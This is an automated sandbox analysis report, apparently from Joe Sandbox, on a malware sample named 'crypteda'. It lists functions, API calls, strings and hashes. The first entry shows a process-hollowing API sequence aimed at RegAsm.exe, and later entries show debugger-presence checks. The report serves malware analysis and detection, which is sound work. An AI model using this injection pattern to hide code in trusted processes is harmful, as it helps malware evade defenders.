Source File: 0000000D.00000002.2001489882.0000000002E42000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E42000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e42000_crypteda.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-1257834847
Opcode ID: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
Instruction ID: fe2886fdf89186822c22944f951c5c3f94392a67ac76fe604c2425034bcf90c7
Opcode Fuzzy Hash: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
Instruction Fuzzy Hash: 77B1E47664028AAFDB60CF68CC80BDA77A5FF88714F158524FA0CAB341D774FA518B94

Function 01401001 Relevance: 1.6, APIs: 1, Instructions: 59
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 01401082

Memory Dump Source

Source File: 0000000D.00000002.2001208623.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1400000_crypteda.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e440e46004147fd49580bdd48f4d7ca6cec137129bdd93e1775acef51cb84229
Instruction ID: 6eac52fbd0e1496e8411011712cf5a078e44eb7f7dc1df2a64c351d0dca66dcf
Opcode Fuzzy Hash: e440e46004147fd49580bdd48f4d7ca6cec137129bdd93e1775acef51cb84229
Instruction Fuzzy Hash: 412104B1D00259EFDB14CFAAD880BEEFBB4FF48310F10852AE918A7240C7795954CBA5

Function 01401008 Relevance: 1.6, APIs: 1, Instructions: 58
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 01401082

Memory Dump Source

Source File: 0000000D.00000002.2001208623.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1400000_crypteda.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: d6ab08c7436ead2b0ee3d4be1ee24b43376041e70359df99de1db7053670ff74
Instruction ID: 6e5ef3045334d73e44a7c07da4993df48f8882f18b3175a7f7358fa3d1337a1c
Opcode Fuzzy Hash: d6ab08c7436ead2b0ee3d4be1ee24b43376041e70359df99de1db7053670ff74
Instruction Fuzzy Hash: E52127B1D00259EBDB10DFAAC880BDEFBB4FF48710F10852AE518A7240C779A940CBE1

Analysis Process: RegAsm.exePID: 3872, Parent PID: 3920COMMON

Executed Functions

Function 0041FE9D Relevance: 13.8, APIs: 9, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041FB56: CreateFileW.KERNELBASE(?,00000000,?,0041FF46,?,?,00000000,?,0041FF46,?,0000000C), ref: 0041FB73

GetLastError.KERNEL32 ref: 0041FFB1
__dosmaperr.LIBCMT ref: 0041FFB8
GetFileType.KERNELBASE(00000000), ref: 0041FFC4
GetLastError.KERNEL32 ref: 0041FFCE
__dosmaperr.LIBCMT ref: 0041FFD7
CloseHandle.KERNEL32(00000000), ref: 0041FFF7
CloseHandle.KERNEL32(?), ref: 00420144
GetLastError.KERNEL32 ref: 00420176
__dosmaperr.LIBCMT ref: 0042017D

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID:
API String ID: 4237864984-0
Opcode ID: 8a6ad238e456dfb5c6acf6d43a8fdbc71dc0bcedd465f29062b7f109bfad7472
Instruction ID: bfa7e2cc036e27e26c30110013f893a37d44138e153881355e96e1974d99462b
Opcode Fuzzy Hash: 8a6ad238e456dfb5c6acf6d43a8fdbc71dc0bcedd465f29062b7f109bfad7472
Instruction Fuzzy Hash: 6AA14832A041148FCF19EF68EC91BAE3BA0AB06314F14016EF801EB3D2C7799857DB59

Function 004038B0 Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 401
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(shell32.dll), ref: 004038FA

Strings

` H, xrefs: 0040392E
shell32.dll, xrefs: 004038F5
.exe, xrefs: 004039D4, 004039E5, 00403C18, 00403C29
open, xrefs: 00403DF4, 00403E15

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: .exe$` H$open$shell32.dll
API String ID: 1029625771-2834257608
Opcode ID: d4c97a5889b133242607335a8d42e56c099b9df17a057e4e584b721371644320
Instruction ID: 857efcede616dcd8c83fca5595c578517c5b7e2349eff73c2340159bc27b1389
Opcode Fuzzy Hash: d4c97a5889b133242607335a8d42e56c099b9df17a057e4e584b721371644320
Instruction Fuzzy Hash: F7E118312083408BE328DF28CD45B6FBBE5BF85305F144A2DF485AB2D2D779E5458B9A

Function 00411422 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,0041141C,00000016,0040BD88,?,?,FD41157B,0040BD88,?), ref: 00411433
TerminateProcess.KERNEL32(00000000,?,0041141C,00000016,0040BD88,?,?,FD41157B,0040BD88,?), ref: 0041143A
ExitProcess.KERNEL32 ref: 0041144C

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: fdc9db31659cbe28c415a8b0888f718e5b65b0592ff8268f2e9698ce38014a47
Instruction ID: 9f5cffd960a9e5e784bd49b974cdbcfa3e36e1e28e8dab912b0267a8a3414f4f
Opcode Fuzzy Hash: fdc9db31659cbe28c415a8b0888f718e5b65b0592ff8268f2e9698ce38014a47
Instruction Fuzzy Hash: 76D09E31100508AFCF117F61DC0DA993F2AAF44745B858025BA0556131CB3A9993EA5D

Function 00416D9F Relevance: 3.2, APIs: 2, Instructions: 191
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004164B2: GetConsoleOutputCP.KERNEL32(FD41157B,00000000,00000000,0040BDA8), ref: 00416515

WriteFile.KERNELBASE(FFBF5BE8,00000000,?,0040BC65,00000000,00000000,00000000,00000000,?,?,0040BC65,?,?,004328B8,00000010,0040BDA8), ref: 00416F08
GetLastError.KERNEL32(?,0040BC65,?,?,004328B8,00000010,0040BDA8,?,?,00000000,?), ref: 00416F12

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: f464ed671a76038d08897ffb1fb948258ea98ac2c0acb72c9529f46f39d22c7a
Instruction ID: 2fa65d471856ac80343e11fa98bfc53c13d7c1330e77fa5001ed2fcda6fa269c
Opcode Fuzzy Hash: f464ed671a76038d08897ffb1fb948258ea98ac2c0acb72c9529f46f39d22c7a
Instruction Fuzzy Hash: 9F61D675D00249AFDF10DFA9C844AEF7FB9AF09308F16415AF800A7252D339D986CB69

Function 00414D4D Relevance: 3.1, APIs: 2, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,00414C34,00000000,CF830579,00432C48,0000000C,00414CF0,0040BCFB,?), ref: 00414DA3
GetLastError.KERNEL32(?,00414C34,00000000,CF830579,00432C48,0000000C,00414CF0,0040BCFB,?), ref: 00414DAD

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ChangeCloseErrorFindLastNotification
String ID:
API String ID: 1687624791-0
Opcode ID: cf05b64a0bbd980239ba65db1c1c6f103e722fbee84b5f4660c8636332b429dd
Instruction ID: 85074f4f6ff141bd7efcce855698502eef5de44000b51f9bf88cca9df30e92f5
Opcode Fuzzy Hash: cf05b64a0bbd980239ba65db1c1c6f103e722fbee84b5f4660c8636332b429dd
Instruction Fuzzy Hash: 77114C326041105ACB206675BC857FE27459BD2738F25025FF908C72C2EB388CC1529D

Function 00403ED0 Relevance: 3.0, APIs: 2, Instructions: 22
synchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,004038B0,00000000,00000000,FD41157B), ref: 00403EF6
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00403EFF

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateObjectSingleThreadWait
String ID:
API String ID: 1891408510-0
Opcode ID: 9419f3325bceeff1f49f4aa1ba74e54397c78aa36a806008d2e466c127b4d74a
Instruction ID: 586eb301f3ad505b2fb8a5e2c0845f04df15ed7da879dad1818cca3ffdf321d7
Opcode Fuzzy Hash: 9419f3325bceeff1f49f4aa1ba74e54397c78aa36a806008d2e466c127b4d74a
Instruction Fuzzy Hash: 7EE08675748300ABD720FF24DC07F1A3BE4BB48B01F914A39F595A62D0D6747404965E

Function 004143BC Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 672b8ef80a1082ffe797a66fe554d50d659c07feffc08aafbed84bfcd02d8428
Instruction ID: 2b8528776d8d16502f0b8a76a82d10506d50424a6c704f85483994a1d03f90d6
Opcode Fuzzy Hash: 672b8ef80a1082ffe797a66fe554d50d659c07feffc08aafbed84bfcd02d8428
Instruction Fuzzy Hash: 9D012D377001255FDF25CE6EEC40BDB3396EBC47243548536F914DB544DA34D8829759

Function 00413EE2 Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__wsopen_s.LIBCMT ref: 00413F1C

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: caa3c88317b3bbee83e5854bbea9c678844db8772e50a39c133be3f8c5400fb7
Instruction ID: ec9553a80a63d261aca480410fc230252e3ea256619d772961208cbce9478613
Opcode Fuzzy Hash: caa3c88317b3bbee83e5854bbea9c678844db8772e50a39c133be3f8c5400fb7
Instruction Fuzzy Hash: F6111871A0420AAFCF05DF58E9419DF7BF4EF48304F0440AAF805AB351D631DA15CBA8

Function 0041FB56 Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,00000000,?,0041FF46,?,?,00000000,?,0041FF46,?,0000000C), ref: 0041FB73

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 32f1cee3c5876f16e38c750b1e34007635eee82df29fa4d42b06ff8a7cf34f14
Instruction ID: 28cfbda6749b70c9de2fbd9d245fef773b8951bf2dd70127050a9a6bf190398c
Opcode Fuzzy Hash: 32f1cee3c5876f16e38c750b1e34007635eee82df29fa4d42b06ff8a7cf34f14
Instruction Fuzzy Hash: 05D06C3210010DFBDF128F84DC06EDA3FAAFB4C714F018010FA5856021C732E832AB94

Non-executed Functions

Function 0041EB91 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(3FC00000,2000000B,0041EEAF,00000002,00000000,?,?,?,0041EEAF,?,00000000), ref: 0041EC2A
GetLocaleInfoW.KERNEL32(3FC00000,20001004,0041EEAF,00000002,00000000,?,?,?,0041EEAF,?,00000000), ref: 0041EC53
GetACP.KERNEL32(?,?,0041EEAF,?,00000000), ref: 0041EC68

Strings

OCP, xrefs: 0041EBE5
ACP, xrefs: 0041EBAF

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: ae0517b9bda7198648f1cbed6e652a34a4e79f3510d6da964a24c0c18db862fc
Instruction ID: c85fc144d60ddc6525dae33cd09e0d060d1fedf04b2ffe12a12074c054b5e7b8
Opcode Fuzzy Hash: ae0517b9bda7198648f1cbed6e652a34a4e79f3510d6da964a24c0c18db862fc
Instruction Fuzzy Hash: 0D218E3A704104EADB38CF16CD05AD772A6AB54B54B5A8426ED0AD7304F73ADEC1C798

Function 0041ED66 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041512B: GetLastError.KERNEL32(?,00000008,004176AA), ref: 0041512F
Part of subcall function 0041512B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151D1

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0041EE72
IsValidCodePage.KERNEL32(00000000), ref: 0041EEBB
IsValidLocale.KERNEL32(?,00000001), ref: 0041EECA
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0041EF12
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0041EF31

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: cb1f43e0842fc1b57530168fcb5aadb50c479eb7f68bca799765aa874482350f
Instruction ID: 6dcde63b9ee3f13586b647639649f64518bbb4cfa058cf0b9fa01e7f3d3dbd24
Opcode Fuzzy Hash: cb1f43e0842fc1b57530168fcb5aadb50c479eb7f68bca799765aa874482350f
Instruction Fuzzy Hash: 2951A075A00206ABDF20EFA6DC45AEB77B8BF04700F49452AED11E7290D7789981CB69

Function 0041E402 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041512B: GetLastError.KERNEL32(?,00000008,004176AA), ref: 0041512F
Part of subcall function 0041512B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151D1

GetACP.KERNEL32(?,?,?,?,?,?,00411ED1,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0041E4C3
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00411ED1,?,?,?,00000055,?,-00000050,?,?), ref: 0041E4EE
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0041E651

Strings

utf8, xrefs: 0041E5C0

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: 1eb3fb8f5e23b37753c7c554b08859c7808b39e1099525de27aec97b4695ee5a
Instruction ID: e1a377e19c5f71cd44c11824ea9e35987c280acd53c56ff76f51ea565ef0af36
Opcode Fuzzy Hash: 1eb3fb8f5e23b37753c7c554b08859c7808b39e1099525de27aec97b4695ee5a
Instruction Fuzzy Hash: AB71F779A00201BADB24AB77CC46BEB73A9EF44718F14442BFD05D7281FA7CE9818659

Function 00415625 Relevance: 6.3, APIs: 4, Instructions: 337COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 004156B2

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: d8f824a3a597dbe048be884bb3e91045552750dfa5ffe6b567c0d7537b351b3d
Instruction ID: a35172905f2c9e80df687ae2f548e4ff91b5a56ee58bfd6494556f9989062819
Opcode Fuzzy Hash: d8f824a3a597dbe048be884bb3e91045552750dfa5ffe6b567c0d7537b351b3d
Instruction Fuzzy Hash: 44B16A72E00655DFDB11DF68C8817EEBBA5EF85310F14416BE815AB381D238DD81CBA9

Function 00407AF1 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00407AFD
IsDebuggerPresent.KERNEL32 ref: 00407BC9
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00407BE9
UnhandledExceptionFilter.KERNEL32(?), ref: 00407BF3

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: bdb8d4ffe5861b74027a400539b36d4e8f115b4355d90c864d7f04757154f5f6
Instruction ID: e6d40a2ad45d1a0383389914ec1c7b177219f7559a83785ff08c1c1c590c79bb
Opcode Fuzzy Hash: bdb8d4ffe5861b74027a400539b36d4e8f115b4355d90c864d7f04757154f5f6
Instruction Fuzzy Hash: 76314975D0521CDBDB21DFA0D989BCDBBB8BF08304F1040AAE40DAB290EB755A85CF49

Function 0041E815 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 0041512B: GetLastError.KERNEL32(?,00000008,004176AA), ref: 0041512F
Part of subcall function 0041512B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151D1

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041E869
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041E8B3
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041E979

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 70364720e12663236a414e2dcb1dce5353f717cfc86153b9853f2e5e3999c068
Instruction ID: 519a0177cb526aaaa458b2f6b8e716251f3c0a2969a148864a23d158d411bc59
Opcode Fuzzy Hash: 70364720e12663236a414e2dcb1dce5353f717cfc86153b9853f2e5e3999c068
Instruction Fuzzy Hash: 9B617B75A102079FEB289F26CD82BEA77A8FF44354F14417AED05C6681E738E981CB58

Function 0040DD68 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000001), ref: 0040DE60
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000001), ref: 0040DE6A
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000001), ref: 0040DE77

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: c9299be453f233d1f34e7b439eda9d176e6efb048eb56d82e46d8d1a49e6a2a2
Instruction ID: d2f4f48b52c025ad6b33b38734eeeb510d7991f02fac7d06ce453438f3003fcc
Opcode Fuzzy Hash: c9299be453f233d1f34e7b439eda9d176e6efb048eb56d82e46d8d1a49e6a2a2
Instruction Fuzzy Hash: A731C574D012289BCB21DF65D98978DBBB4BF58310F5041EAE41CA7290E7749F858F49

Function 0041B6DA Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 240dabf42296fc0716cf1df3a365cfd0642dfbeb5de634df910a17514a9db46b
Instruction ID: a6190f5805de9a564eec38dffe1fad162b0df58d225cb52605cfe5cd4e5bec91
Opcode Fuzzy Hash: 240dabf42296fc0716cf1df3a365cfd0642dfbeb5de634df910a17514a9db46b
Instruction Fuzzy Hash: 8A41A2B5904219AFDB20DF69CC89AEEBBB8EF45304F1441DEE418D3201DB359E858F54

Function 0041EA68 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 0041512B: GetLastError.KERNEL32(?,00000008,004176AA), ref: 0041512F
Part of subcall function 0041512B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151D1

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041EABC

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 9d790b3c45bb2bf0643d5e8ab68d8f402ebc04587a63254904ddd76dacdf4023
Instruction ID: 789565f62a9f3b81efb00754059a0722f9dd97d30215528fd29c40c366a42c5d
Opcode Fuzzy Hash: 9d790b3c45bb2bf0643d5e8ab68d8f402ebc04587a63254904ddd76dacdf4023
Instruction Fuzzy Hash: F1217136605206ABDB28DE26DC42AFB77A8EF44714B10407FFD06D6241EB79BD81CA58

Function 0041E6EF Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041512B: GetLastError.KERNEL32(?,00000008,004176AA), ref: 0041512F
Part of subcall function 0041512B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151D1

EnumSystemLocalesW.KERNEL32(0041E815,00000001,00000000,?,-00000050,?,0041EE46,00000000,?,?,?,00000055,?), ref: 0041E761

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: c41bd8c13944af45959f55b7b285689f368a5b2ee216d29e3bbf5953bd320f82
Instruction ID: 3355e78b0c1919935c13ae0f7f932fd25516bb8159513c05bc37ad2f76743b3e
Opcode Fuzzy Hash: c41bd8c13944af45959f55b7b285689f368a5b2ee216d29e3bbf5953bd320f82
Instruction Fuzzy Hash: 6911E93B6007019FEB189F3AD8916FAB791FF80358B19442EE99687740E7757983C744

Function 0041EC97 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 0041512B: GetLastError.KERNEL32(?,00000008,004176AA), ref: 0041512F
Part of subcall function 0041512B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151D1

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0041EB12,00000000,00000000,?), ref: 0041ECC3

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: f78a423274370276909a02de998c8e2fb19ace7283c045400ea6aabaf7fbf6a9
Instruction ID: a74d281951bb25d9d225ee6b49b477873636137a5a6801bc69a0b20bd4e45b62
Opcode Fuzzy Hash: f78a423274370276909a02de998c8e2fb19ace7283c045400ea6aabaf7fbf6a9
Instruction Fuzzy Hash: BCF0A93AA00126BFDB245A269C45BFB7764EB40754F15442AED07A3280EA78FE82C6D4

Function 0041E5FD Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 0041512B: GetLastError.KERNEL32(?,00000008,004176AA), ref: 0041512F
Part of subcall function 0041512B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151D1

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0041E651

Strings

utf8, xrefs: 0041E5C0

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID: utf8
API String ID: 3736152602-905460609
Opcode ID: d3c02c1389eacca91a5e291a11e928c47885a93e678f07e32e4ca4d141b25baf
Instruction ID: c8b41ea417b063d59171f4d5afc3dd36f9caaff362045ecd69b67607d46fe07f
Opcode Fuzzy Hash: d3c02c1389eacca91a5e291a11e928c47885a93e678f07e32e4ca4d141b25baf
Instruction Fuzzy Hash: AFF0C836A10115ABC724AF35EC46FFA37E8EB88314F51057EFA02D7281DA7CAD458758

Function 0041E78A Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041512B: GetLastError.KERNEL32(?,00000008,004176AA), ref: 0041512F
Part of subcall function 0041512B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151D1

EnumSystemLocalesW.KERNEL32(0041EA68,00000001,45F1B473,?,-00000050,?,0041EE0A,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0041E7D4

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 02464ed723b4c354a84e3378b332530d88ad943763cb876e16d480aee733ffc6
Instruction ID: 6c1b8be79df370ff527d3fdf83c27c448d8a6d1d4b53373dd59006919712f969
Opcode Fuzzy Hash: 02464ed723b4c354a84e3378b332530d88ad943763cb876e16d480aee733ffc6
Instruction Fuzzy Hash: 4AF0FC3A3003045FEB145F36DC816BABB95FF81758F15442EFD0647680D6755C82D714

Function 00414128 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0040E0B6: EnterCriticalSection.KERNEL32(?,?,00412ECC,00000000,00432B68,0000000C,00412E93,0000000C,?,004140B7,0000000C,?,004152C9,00000001,00000364,?), ref: 0040E0C5

EnumSystemLocalesW.KERNEL32(0041411B,00000001,00432BE8,0000000C,0041454A,00000000), ref: 00414160

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

